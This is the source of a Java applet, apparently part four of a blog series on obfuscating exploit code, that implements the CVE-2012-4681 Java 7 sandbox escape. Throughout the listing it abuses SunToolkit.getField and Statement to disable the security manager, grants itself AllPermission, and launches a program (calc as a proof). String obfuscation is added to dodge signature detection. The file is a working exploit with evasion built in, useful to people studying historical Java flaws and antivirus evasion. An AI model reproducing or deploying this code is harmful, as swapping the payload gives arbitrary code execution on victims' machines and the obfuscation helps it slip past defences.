Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5

1. /*
2.  *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5
3.  *  
4.  *  Affected product versions:
5.  *  - JDK and JRE 7 Update 6 and before
6.  *
7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
8.  */
9. import java.applet.Applet;
10. import java.awt.Graphics;
11. import java.beans.Expression;
12. import java.beans.Statement;
13. import java.lang.reflect.Field;
14. import java.net.URL;
15. import java.security.*;
16. import java.security.cert.Certificate;
17. import java.lang.reflect.Constructor;
18. import java.lang.reflect.Method;
19. import java.net.URI;
20.  
21. public class Java extends Applet
22. {
23.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
24.     char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
25.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
26.     String   ad = "or",me = "me", aw = "f", kl = "Na"; // forName
27.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
28.  
29.     public void enableSecurity() throws Throwable
30.     {
31.         Object ao[] = new Object[2];
32.         ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
33.         ao[1] = "a"+"c"+"c";
34.        
35.         Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
36.         e.execute();
37.         Field field = (Field)e.getValue();
38.  
39.         Permissions pe = new Permissions();
40.         pe.add(new AllPermission());
41.  
42.         URI uri = new URI(new String(file));
43.         CodeSource cs = new CodeSource( uri.toURL(), new Certificate[0]);
44.         ProtectionDomain pd = new ProtectionDomain(cs,pe);
45.        
46.         AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
47.        
48.         Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
49.         Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
50.         Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
51.         field.set(stat, ac);
52.         Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
53.         m.invoke(stat);
54.     }
55.  
56.     public void init()
57.     {
58.         try
59.         {
60.             enableSecurity();
61.             Runtime.getRuntime().exec("calc");
62.         }
63.         catch(Throwable t){}
64.     }
65.    
66.     private Class GimmeClass(String ps) throws Throwable
67.     {
68.         Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
69.         le.execute();
70.         return (Class)le.getValue();
71.     }    
72. }